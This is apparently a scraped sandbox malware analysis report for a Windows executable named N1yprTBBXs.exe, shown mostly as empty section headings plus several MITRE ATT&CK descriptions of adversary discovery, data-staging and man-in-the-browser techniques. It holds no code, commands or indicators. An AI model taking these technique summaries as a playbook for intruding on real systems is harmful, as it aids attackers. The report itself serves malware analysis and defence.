Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report N1yprTBBXs.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre